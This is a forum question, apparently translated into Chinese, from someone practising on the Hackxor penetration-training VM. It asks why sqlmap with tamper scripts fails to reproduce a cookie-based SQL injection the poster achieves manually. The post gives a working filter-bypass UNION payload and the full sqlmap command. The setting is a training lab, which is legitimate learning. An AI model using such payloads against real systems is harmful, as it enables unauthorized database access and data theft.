现在我正在修补Hackxor VM(一个渗透训练环境),我正在尝试使用 sqlmap 来利用我可以手动利用的漏洞。
该漏洞存在于 cookie 标头“userid”参数中。该应用程序实现了一些 SQLi 过滤器来阻止空格和一些 SQL 关键字,因此您必须对有效负载进行一些卷积。
我可以通过 HTTP 代理成功利用在提到的“userid”参数中注入以下有效负载的漏洞:
71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users
然后我尝试使用以下命令复制使用 sqlmap 的注入,但没有成功:
sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" -p "userid" --level 5 --tamper "nonrecursivereplacement.py,space2comment.py" --sql-query="71934 UNION SELECT * from users"
我希望 sqlmap只注入给定的查询并返回一个成功的漏洞利用,但是 sqlmap 尝试了很多查询,最后返回的 'userid' 参数不会受到攻击。
我究竟做错了什么?